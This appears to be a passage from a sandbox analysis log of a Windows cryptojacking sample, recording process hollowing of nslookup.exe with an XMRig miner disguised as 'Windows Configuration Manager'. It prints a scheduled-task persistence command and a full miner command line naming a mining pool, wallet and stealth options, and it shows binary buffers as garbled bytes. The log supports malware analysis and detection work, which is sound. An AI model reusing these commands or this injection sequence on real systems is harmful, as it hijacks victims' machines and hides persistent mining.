 buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $ý›:º¹úTé¹úTé¹úTéâ’Pè¢úTéâ’Wè´úTéâ’QèqúTé'Z“é½úT鲕PèªúT鲕Wè°úT鲕Qè/úTé•Pè«úTéâ’Uè¬úTé¹úUéÓûTé<ŠPèêøTé•]èEúTé•Wè½úTé•«é¸úTé¹úÃé¸úTé•Vè¸úTéRich¹úTéPEd† Náað" ’4,A|2/@0v`ôrGܐu˜s¨ uЉ„ DÐ D(  D0°4x .textd4’4 `.rdatavæ°4è–4@@.dataS+ G~G@À.pdata¨s”H@@_RANDOMXV u¨J@`_SHA3_25@ 0u ¶J@`_TEXT_CNQ@u ÀJ@`_TEXT_CN„`uàJ@`_RDATA”€uòJ@@.rsrc˜uôJ@@.relocЉ uŠúJ@B
base_address: 0x0000000140000000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: H‹Ð%Àÿ HÁÊ âÀÿ ÄãûðÐ %Àÿ âÀÿ fffff„SUWVATAUAVAWHƒìPót$@ó|$0óDD$ óDL$óD$HƒìPóD\$@óDd$0óDl$ óDt$óD<$QH‹*H‹zH‹ÅHÁè %ÀÿÿI‹ðI‹ÙH‹ÅHÁÍ M3ÀM3ÉM3ÒM3ÛM3äM3íM3öM3ÿHIxfD(AHfD(IXfD(QhfD(YxfD(-ˆfD(5fD(=–H‹Ð%ÀÿHÁÊ âÀÿHƒì(Ç$ÀŸÇD$À¿ÇD$ÀßÇD$ ÀÿÇD$ ÿÿÿÿëdfffffff„fffffff„fffffff„€ÀÿÿÿÿÀÿÿÿÿð€ð€H¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QHÄ€ëfffffff„„H H‰L$L3L3IL3QL3YL3a L3i(L3q0L3y8H H‰L$óæóæIóæQóæYóæa óæi(óæq0óæy8fATåfATífATõfATýfAVæfAVîfAVöfAVþH H‰L$L3L3IL3QL3YL3a L3i(L3q0L3y8H H‰L$óæóæIóæQóæYóæa óæi(óæq0óæy8ÈX¢æЏÈP¢îЏÈH¢öЏÈ@¢þА‹ÍáÀÿÿL3HÁÍ H3è‹ÕâÀÿÿL3LL3TL3\L3d L3l(L3t0L3|8HìÈH‰\$@L‰D$8L‰L$0L‰T$(L‰\$ L‰d$L‰l$L‰t$L‰<$HÁÍ H3èH‹ÝHÁë&ãÿÿÿH‹\$@L3D$8L3L$0L3T$(L3\$ L3d$L3l$L3t$L3<$HÄÈH‹L$L‰L‰IL‰QL‰YL‰a L‰i(L‰q0L‰y8H‹L$fWÄfWÍfWÖfWßf)f)If)Q f)Y0DSUWVATAUAVAWH‹9H‹òI‹èAQ H‹ÝèÞL‰L‰NL‰VL‰^L‰f L‰n(L‰v0L‰~8HƒÅHƒÆ@H;,$rÈAYA_A^A]A\^_][Ãfffffff„fffffff„@SUWVATAUAVAWHìó$óL$óT$ ó\$0ód$@ól$Pót$`ó|$póD„$€óDŒ$óD”$ óDœ$°óD¤$ÀóD¬$ÐóD´$àóD¼$ðH‹9H‹òI‹èAQHƒì(éš-•L-ôQXü¡õYŠ— FØÂ8ߙp§\I"¿¹&bŠŸ—%MI ìªÎ¹ï7’x-æltV*/Nå,¶÷;…„fffffff„fffffff„fffffff„DF@†€†À†H‹ÝHãÿÿ?HÁãHßHEH%ÿÿ?HÁàHÇH‰$HEH%ÿÿ?HÁàHÇH‰D$HEH%ÿÿ?HÁàHÇH‰D$HEH%ÿÿ?HÁàHÇH‰D$LEL¯ïþÿÿL‹ ðþÿÿM3ÈL‹îþÿÿM3ÐL‹ìþÿÿM3ØL‹%êþÿÿM3àL‹-èþÿÿM3èL‹5æþÿÿM3ðL‹=äþÿÿM3øH‰l$ Äâ}D$ ÅýÔmþÿÿÄâ} ŒþÿÿŽsРŵsÑ Å}ôÑÅ5ôØŽôÁÄÁ%só Åýsð ÄA-ÔÓÅ­ÔÀÄâ} aþÿÿÅýïÉÄâ}\þÿÿÅýïÒÄâ}WþÿÿÅýïÛÄâ}%RþÿÿÅýïäÄâ}-MþÿÿÅýïíÄâ}5HþÿÿÅýïöÄâ}=CþÿÿÅýïÿÄb}=öýÿÿÄÁ s÷L‰Å}lÁL‰NÅmlËL‰VÅ]lÕL‰^ÅMlßL‰f Å}máL‰n(ÅmmëL‰v0Å]mõL‰~8ÅMmÿÄÃ=FÁ ÄÃ-FË ÅþF@ÅþN`ÄÃFÕ Äà Fß Åþ–€Åþž ÄÃ=Fá1ÄÃ-Fë1Åþ¦ÀÅþ®àÄÃFõ1Äà Fÿ1Åþ¶Åþ¾ HƒÅHÆ@H;l$(‚HƒÄ(AYóo$óoL$óoT$ óo\$0óod$@óol$Póot$`óo|$póDo„$€óDoŒ$óDo”$ óDoœ$°óDo¤$ÀóDo¬$ÐóDo´$àóDo¼$ðÅøwHÄA_A^A]A\^_][ÃHƒì(H‰$Å~t$H‹D$(H‹\$0H‹L$8H‹T$@Å~oÅ~o Å~oÅ~oÄA=láÄA-lëÄCFõ ÄÁ}ïÆÄCFõ1ÄÁmïÖÄA=máÄA-mëÄCFõ ÄÁuïÎÄCFõ1ÄÁeïÞÅ~o@ Å~oK Å~oQ Å~oZ ÄA=láÄA-lëÄCFõ ÄÁ]ïæÄCFõ1ÄÁMïöÄA=máÄA-mëÄCFõ ÄÁUïîÄCFõ1ÄÁEïþH‹$Å~ot$HƒÄ(Åþ$H‹$H%ÿÿ?HÁàHÇH‰$H‹D$H%ÿÿ?HÁàHÇH‰D$H‹D$H%ÿÿ?HÁàHÇH‰D$H‹D$H%ÿÿ?HÁàHÇH‰D$HƒÄ(YL‰L‰IL‰QL‰YL‰a L‰i(L‰q0L‰y8fA@fIPfQ`fYpHI@fa@fiPfq`fypóDo<$óDot$óDol$ óDod$0óDo\$@HƒÄPóDo$óDoL$óDoD$ óo|$0óot$@HƒÄPA_A^A]A\^_][Ãfffffff„fffffff„fff„L3L3KL3SL3[L3c L3k(L3s0L3{8Hãÿÿ?HÁãHߐfffffff„LCHãÿÿ?HÁãHßL¯cL‹ dM3ÈL‹bM3ÐL‹`M3ØL‹%^M3àL‹-\M3èL‹5ZM3ðL‹=XM3øéXfffffff„f„-•L-ôQXü¡õYŠ— FØÂ8ߙp§\I"¿¹&bŠŸ—%MI ìªÎ¹ï7’x-æltV*/Nå,¶÷;…„ºL‹Á3ÀH½ÉHÓâI÷ðÃ
base_address: 0x0000000140752000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: ÅøwH‰\$H‰t$H‰|$UATAUAVAWHƒìPót$@ó|$0óDD$ óDL$óD$HƒìPóD\$@óDd$0óDl$ óDt$óD<$Hì@Hl$@HƒåàÅùïÀ3ÿÇEL‹âÇE L‹òÇE IÁîAƒäÇE  M‹èÆE H‹ñ‹ßÅýE ÅýE@ÅýE`Åý…€Åý… Åý…ÀÅý…àM…öt>¶DHM H ÁH‹H1L{Hƒûu HM èñHƒûH‹ÇIEÇHƒÆH‹ØIƒîuÂH‹×M…ätL‹Ç¶2HÿÂÄâ¹÷ÈH ùIƒÀI;Ôrè¶DHU H¹JåÄâù÷ÉH3 ¸HÁà?H3ÏH‰ H1EhHM èxÅüE ÄÁ|EÅøwHÄ@óDo<$óDot$óDol$ óDod$0óDo\$@HƒÄPóDo$óDoL$óDoD$ óo|$0óot$@HƒÄPA_A^A]A\]H‹\$H‹t$H‹|$ÃLL ÖL/¸HI`Äâ}YA ÅþoI¨ÅþoQÈÅþoYèÅþoaÅþoi(ÅþoqHfÅ}pêNÅUïãÅ]ïÎÅïáÄAïáÄCýܓÅïêÄÃýýNÄÁ=sÔ?ÄAÔÌÄA=ëÁÄCýø9ÄA=ïóÄCýöÅïèÅïïÄÁEsÕ?ÄAÔÅÅ=ëÇÄÁmïÖÄÁ}ïÆÄCøÀÄC%ÝÄAïûÄBíGP ÄÂíEQ ÄÁmëÒÄÁeïßÄBåGXàÄÂåEYàÄÁeëÛÄÁ]ïçÄBÝG ÄÂÝE!ÄÁ]ëäÄÁUïïÄBÕGh ÄÂÕEi ÄÁUëíÄÁMï÷ÄcýҍÄcýۍÄBÍGp@ÄBÍEA@ÄA=ëÆÄÁuïÏÄcýäÄcýírÄBõGxÀÄBõEIÀÄA5ëÏÄÁ sØÄÁ=ßþÄÃ5Ý ÄC%ù ÄÃ-ë ÄC5ò ÄÃeÛ0ÄCü0ÄÃUé0ÄC õ0ÄÃeÜÀÄCýÀÄÃUíÀÄC óÀÄÁeßßÄÁUßîÄÃñ ÄC-ü ÄÁeïÚÄÃMò0ÄCû0ÄÁUïìÄÃMóÀÄCùÀÄÁMß÷ÄÁMïõÄÃýàÄc]ø0ÄÃýÈ9ÄãuÈÀÄÁußÏÄÃ%Ô ÄCó ÄÃmÕ0ÄC ò0ÄÃmÒÀÄC ôÀÄÁmßÖÄÁmïÑÄãýÿÄãýÛÄãýíÄãýörÄÃâ ÄCõ ÄÃ]ä0ÄC ñ0ÄÃ]áÀÄC òÀÄÁ]ßæÅýïÇÄÁuïÈÄÁ]ïãÄÁ}ïMR ÿÈ…²ýÿÿÄáù~A ÅþI¨ÅþQÈÅþYèÅþaÅþi(ÅþqHÃfffff„$)>-8' =7,+=.?$%:6 8>1',+2‚€‚€‚€‚€Š€€Š€€Š€€Š€€€€€€€€€€€€€€‹€‹€‹€‹€€€€€€€€€€€€€€€€€ €€ €€ €€ €€ŠŠŠŠˆˆˆˆ €€ €€ €€ €€ € € € €‹€€‹€€‹€€‹€€‹€‹€‹€‹€‰€€‰€€‰€€‰€€€€€€€€€€€€€€€€€€€€€€€€€€ € € € € €€ €€ €€ €€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
base_address: 0x0000000140753000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: à1ÿ1á1ï1(101@1P1è1€111 1h1°1Ð11®1«1×1§1´1Ä1Ô1¤1Ü1¸1ð1à1°1À1Ð1 1ø1
base_address: 0x0000000140758000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:  €8€P€h€ €  ux“u}x4VS_VERSION_INFO½ïþ?ØStringFileInfo´000004b0 CompanyNamedFileDescriptionWindows Configuration Manager,FileVersion2.0.0$LegalCopyright< OriginalFilenamexmrig.exe\ProductNameWindows Configuration Manager0ProductVersion2.0.0DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0000000140759000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x000007fffffd4010
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $ý›:º¹úTé¹úTé¹úTéâ’Pè¢úTéâ’Wè´úTéâ’QèqúTé'Z“é½úT鲕PèªúT鲕Wè°úT鲕Qè/úTé•Pè«úTéâ’Uè¬úTé¹úUéÓûTé<ŠPèêøTé•]èEúTé•Wè½úTé•«é¸úTé¹úÃé¸úTé•Vè¸úTéRich¹úTéPEd† Náað" ’4,A|2/@0v`ôrGܐu˜s¨ uЉ„ DÐ D(  D0°4x .textd4’4 `.rdatavæ°4è–4@@.dataS+ G~G@À.pdata¨s”H@@_RANDOMXV u¨J@`_SHA3_25@ 0u ¶J@`_TEXT_CNQ@u ÀJ@`_TEXT_CN„`uàJ@`_RDATA”€uòJ@@.rsrc˜uôJ@@.relocЉ uŠúJ@B
base_address: 0x0000000140000000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0
Process injection Process 2020 called NtSetContextThread to modify thread in remote process 872
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.r14: 0
registers.r15: 0
registers.rcx: 5371802236
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1440632
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092841984
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x0000000000000320
process_identifier: 872
1 0 0
Process injection Process 2020 resumed a thread in remote process 872
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000320
suspend_count: 1
process_identifier: 872
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 76 (SystemFirmwareTableInformation)
-1073741789 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000138
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000180
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000220
suspend_count: 1
process_identifier: 2020
1 0 0

CreateProcessInternalW

 thread_identifier: 2044
thread_handle: 0x0000000000000370
process_identifier: 1976
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000378
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000318
suspend_count: 1
process_identifier: 2020
1 0 0

CreateProcessInternalW

 thread_identifier: 752
thread_handle: 0x00000000000003d4
process_identifier: 812
current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Libs\
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000003f0
1 1 0

NtResumeThread

 thread_handle: 0x000000000000055c
suspend_count: 1
process_identifier: 2020
1 0 0

NtResumeThread

 thread_handle: 0x000000000000077c
suspend_count: 1
process_identifier: 2020
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000cc
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000cc
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 2020
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000cc
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000cc
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 2020
1 0 0

CreateProcessInternalW

 thread_identifier: 3024
thread_handle: 0x0000000000000320
process_identifier: 872
current_directory: C:\Windows\System32
filepath:
track: 1
command_line: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=49XarhMHsp18ZAs9SiucnGHv3LcK7qChbLKquEQftqmbXayAcpYVdHr5Dy6Z7n8EKeKJzjDcms3dJfpC2S2jMGLcFaWBZHG --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 1
process_handle: 0x0000000000000324
1 1 0

NtUnmapViewOfSection

 base_address: 0x0000000140000000
region_size: 8786417680384
process_identifier: 872
process_handle: 0x0000000000000324
-1073741799 0

NtAllocateVirtualMemory

 process_identifier: 872
region_size: 7745536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000324
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $ý›:º¹úTé¹úTé¹úTéâ’Pè¢úTéâ’Wè´úTéâ’QèqúTé'Z“é½úT鲕PèªúT鲕Wè°úT鲕Qè/úTé•Pè«úTéâ’Uè¬úTé¹úUéÓûTé<ŠPèêøTé•]èEúTé•Wè½úTé•«é¸úTé¹úÃé¸úTé•Vè¸úTéRich¹úTéPEd† Náað" ’4,A|2/@0v`ôrGܐu˜s¨ uЉ„ DÐ D(  D0°4x .textd4’4 `.rdatavæ°4è–4@@.dataS+ G~G@À.pdata¨s”H@@_RANDOMXV u¨J@`_SHA3_25@ 0u ¶J@`_TEXT_CNQ@u ÀJ@`_TEXT_CN„`uàJ@`_RDATA”€uòJ@@.rsrc˜uôJ@@.relocЉ uŠúJ@B
base_address: 0x0000000140000000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

NtGetContextThread

 thread_handle: 0x00000000000000cc
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000cc
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 2020
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x0000000140001000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x000000014034b000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x000000014047a000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0000000140730000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: H‹Ð%Àÿ HÁÊ âÀÿ ÄãûðÐ %Àÿ âÀÿ fffff„SUWVATAUAVAWHƒìPót$@ó|$0óDD$ óDL$óD$HƒìPóD\$@óDd$0óDl$ óDt$óD<$QH‹*H‹zH‹ÅHÁè %ÀÿÿI‹ðI‹ÙH‹ÅHÁÍ M3ÀM3ÉM3ÒM3ÛM3äM3íM3öM3ÿHIxfD(AHfD(IXfD(QhfD(YxfD(-ˆfD(5fD(=–H‹Ð%ÀÿHÁÊ âÀÿHƒì(Ç$ÀŸÇD$À¿ÇD$ÀßÇD$ ÀÿÇD$ ÿÿÿÿëdfffffff„fffffff„fffffff„€ÀÿÿÿÿÀÿÿÿÿð€ð€H¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QHÄ€ëfffffff„„H H‰L$L3L3IL3QL3YL3a L3i(L3q0L3y8H H‰L$óæóæIóæQóæYóæa óæi(óæq0óæy8fATåfATífATõfATýfAVæfAVîfAVöfAVþH H‰L$L3L3IL3QL3YL3a L3i(L3q0L3y8H H‰L$óæóæIóæQóæYóæa óæi(óæq0óæy8ÈX¢æЏÈP¢îЏÈH¢öЏÈ@¢þА‹ÍáÀÿÿL3HÁÍ H3è‹ÕâÀÿÿL3LL3TL3\L3d L3l(L3t0L3|8HìÈH‰\$@L‰D$8L‰L$0L‰T$(L‰\$ L‰d$L‰l$L‰t$L‰<$HÁÍ H3èH‹ÝHÁë&ãÿÿÿH‹\$@L3D$8L3L$0L3T$(L3\$ L3d$L3l$L3t$L3<$HÄÈH‹L$L‰L‰IL‰QL‰YL‰a L‰i(L‰q0L‰y8H‹L$fWÄfWÍfWÖfWßf)f)If)Q f)Y0DSUWVATAUAVAWH‹9H‹òI‹èAQ H‹ÝèÞL‰L‰NL‰VL‰^L‰f L‰n(L‰v0L‰~8HƒÅHƒÆ@H;,$rÈAYA_A^A]A\^_][Ãfffffff„fffffff„@SUWVATAUAVAWHìó$óL$óT$ ó\$0ód$@ól$Pót$`ó|$póD„$€óDŒ$óD”$ óDœ$°óD¤$ÀóD¬$ÐóD´$àóD¼$ðH‹9H‹òI‹èAQHƒì(éš-•L-ôQXü¡õYŠ— FØÂ8ߙp§\I"¿¹&bŠŸ—%MI ìªÎ¹ï7’x-æltV*/Nå,¶÷;…„fffffff„fffffff„fffffff„DF@†€†À†H‹ÝHãÿÿ?HÁãHßHEH%ÿÿ?HÁàHÇH‰$HEH%ÿÿ?HÁàHÇH‰D$HEH%ÿÿ?HÁàHÇH‰D$HEH%ÿÿ?HÁàHÇH‰D$LEL¯ïþÿÿL‹ ðþÿÿM3ÈL‹îþÿÿM3ÐL‹ìþÿÿM3ØL‹%êþÿÿM3àL‹-èþÿÿM3èL‹5æþÿÿM3ðL‹=äþÿÿM3øH‰l$ Äâ}D$ ÅýÔmþÿÿÄâ} ŒþÿÿŽsРŵsÑ Å}ôÑÅ5ôØŽôÁÄÁ%só Åýsð ÄA-ÔÓÅ­ÔÀÄâ} aþÿÿÅýïÉÄâ}\þÿÿÅýïÒÄâ}WþÿÿÅýïÛÄâ}%RþÿÿÅýïäÄâ}-MþÿÿÅýïíÄâ}5HþÿÿÅýïöÄâ}=CþÿÿÅýïÿÄb}=öýÿÿÄÁ s÷L‰Å}lÁL‰NÅmlËL‰VÅ]lÕL‰^ÅMlßL‰f Å}máL‰n(ÅmmëL‰v0Å]mõL‰~8ÅMmÿÄÃ=FÁ ÄÃ-FË ÅþF@ÅþN`ÄÃFÕ Äà Fß Åþ–€Åþž ÄÃ=Fá1ÄÃ-Fë1Åþ¦ÀÅþ®àÄÃFõ1Äà Fÿ1Åþ¶Åþ¾ HƒÅHÆ@H;l$(‚HƒÄ(AYóo$óoL$óoT$ óo\$0óod$@óol$Póot$`óo|$póDo„$€óDoŒ$óDo”$ óDoœ$°óDo¤$ÀóDo¬$ÐóDo´$àóDo¼$ðÅøwHÄA_A^A]A\^_][ÃHƒì(H‰$Å~t$H‹D$(H‹\$0H‹L$8H‹T$@Å~oÅ~o Å~oÅ~oÄA=láÄA-lëÄCFõ ÄÁ}ïÆÄCFõ1ÄÁmïÖÄA=máÄA-mëÄCFõ ÄÁuïÎÄCFõ1ÄÁeïÞÅ~o@ Å~oK Å~oQ Å~oZ ÄA=láÄA-lëÄCFõ ÄÁ]ïæÄCFõ1ÄÁMïöÄA=máÄA-mëÄCFõ ÄÁUïîÄCFõ1ÄÁEïþH‹$Å~ot$HƒÄ(Åþ$H‹$H%ÿÿ?HÁàHÇH‰$H‹D$H%ÿÿ?HÁàHÇH‰D$H‹D$H%ÿÿ?HÁàHÇH‰D$H‹D$H%ÿÿ?HÁàHÇH‰D$HƒÄ(YL‰L‰IL‰QL‰YL‰a L‰i(L‰q0L‰y8fA@fIPfQ`fYpHI@fa@fiPfq`fypóDo<$óDot$óDol$ óDod$0óDo\$@HƒÄPóDo$óDoL$óDoD$ óo|$0óot$@HƒÄPA_A^A]A\^_][Ãfffffff„fffffff„fff„L3L3KL3SL3[L3c L3k(L3s0L3{8Hãÿÿ?HÁãHߐfffffff„LCHãÿÿ?HÁãHßL¯cL‹ dM3ÈL‹bM3ÐL‹`M3ØL‹%^M3àL‹-\M3èL‹5ZM3ðL‹=XM3øéXfffffff„f„-•L-ôQXü¡õYŠ— FØÂ8ߙp§\I"¿¹&bŠŸ—%MI ìªÎ¹ï7’x-æltV*/Nå,¶÷;…„ºL‹Á3ÀH½ÉHÓâI÷ðÃ
base_address: 0x0000000140752000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: ÅøwH‰\$H‰t$H‰|$UATAUAVAWHƒìPót$@ó|$0óDD$ óDL$óD$HƒìPóD\$@óDd$0óDl$ óDt$óD<$Hì@Hl$@HƒåàÅùïÀ3ÿÇEL‹âÇE L‹òÇE IÁîAƒäÇE  M‹èÆE H‹ñ‹ßÅýE ÅýE@ÅýE`Åý…€Åý… Åý…ÀÅý…àM…öt>¶DHM H ÁH‹H1L{Hƒûu HM èñHƒûH‹ÇIEÇHƒÆH‹ØIƒîuÂH‹×M…ätL‹Ç¶2HÿÂÄâ¹÷ÈH ùIƒÀI;Ôrè¶DHU H¹JåÄâù÷ÉH3 ¸HÁà?H3ÏH‰ H1EhHM èxÅüE ÄÁ|EÅøwHÄ@óDo<$óDot$óDol$ óDod$0óDo\$@HƒÄPóDo$óDoL$óDoD$ óo|$0óot$@HƒÄPA_A^A]A\]H‹\$H‹t$H‹|$ÃLL ÖL/¸HI`Äâ}YA ÅþoI¨ÅþoQÈÅþoYèÅþoaÅþoi(ÅþoqHfÅ}pêNÅUïãÅ]ïÎÅïáÄAïáÄCýܓÅïêÄÃýýNÄÁ=sÔ?ÄAÔÌÄA=ëÁÄCýø9ÄA=ïóÄCýöÅïèÅïïÄÁEsÕ?ÄAÔÅÅ=ëÇÄÁmïÖÄÁ}ïÆÄCøÀÄC%ÝÄAïûÄBíGP ÄÂíEQ ÄÁmëÒÄÁeïßÄBåGXàÄÂåEYàÄÁeëÛÄÁ]ïçÄBÝG ÄÂÝE!ÄÁ]ëäÄÁUïïÄBÕGh ÄÂÕEi ÄÁUëíÄÁMï÷ÄcýҍÄcýۍÄBÍGp@ÄBÍEA@ÄA=ëÆÄÁuïÏÄcýäÄcýírÄBõGxÀÄBõEIÀÄA5ëÏÄÁ sØÄÁ=ßþÄÃ5Ý ÄC%ù ÄÃ-ë ÄC5ò ÄÃeÛ0ÄCü0ÄÃUé0ÄC õ0ÄÃeÜÀÄCýÀÄÃUíÀÄC óÀÄÁeßßÄÁUßîÄÃñ ÄC-ü ÄÁeïÚÄÃMò0ÄCû0ÄÁUïìÄÃMóÀÄCùÀÄÁMß÷ÄÁMïõÄÃýàÄc]ø0ÄÃýÈ9ÄãuÈÀÄÁußÏÄÃ%Ô ÄCó ÄÃmÕ0ÄC ò0ÄÃmÒÀÄC ôÀÄÁmßÖÄÁmïÑÄãýÿÄãýÛÄãýíÄãýörÄÃâ ÄCõ ÄÃ]ä0ÄC ñ0ÄÃ]áÀÄC òÀÄÁ]ßæÅýïÇÄÁuïÈÄÁ]ïãÄÁ}ïMR ÿÈ…²ýÿÿÄáù~A ÅþI¨ÅþQÈÅþYèÅþaÅþi(ÅþqHÃfffff„$)>-8' =7,+=.?$%:6 8>1',+2‚€‚€‚€‚€Š€€Š€€Š€€Š€€€€€€€€€€€€€€‹€‹€‹€‹€€€€€€€€€€€€€€€€€ €€ €€ €€ €€ŠŠŠŠˆˆˆˆ €€ €€ €€ €€ € € € €‹€€‹€€‹€€‹€€‹€‹€‹€‹€‰€€‰€€‰€€‰€€€€€€€€€€€€€€€€€€€€€€€€€€ € € € € €€ €€ €€ €€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
base_address: 0x0000000140753000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0000000140754000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0000000140756000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer: à1ÿ1á1ï1(101@1P1è1€111 1h1°1Ð11®1«1×1§1´1Ä1Ô1¤1Ü1¸1ð1à1°1À1Ð1 1ø1
base_address: 0x0000000140758000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:  €8€P€h€ €  ux“u}x4VS_VERSION_INFO½ïþ?ØStringFileInfo´000004b0 CompanyNamedFileDescriptionWindows Configuration Manager,FileVersion2.0.0$LegalCopyright< OriginalFilenamexmrig.exe\ProductNameWindows Configuration Manager0ProductVersion2.0.0DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0000000140759000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x000000014075a000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

NtGetContextThread

 thread_handle: 0x0000000000000320
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x000007fffffd4010
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

NtSetContextThread

 registers.r14: 0
registers.r15: 0
registers.rcx: 5371802236
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1440632
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092841984
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x0000000000000320
process_identifier: 872
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000320
suspend_count: 1
process_identifier: 872
1 0 0

CreateProcessInternalW

 thread_identifier: 1812
thread_handle: 0x0000000000000060
process_identifier: 3028
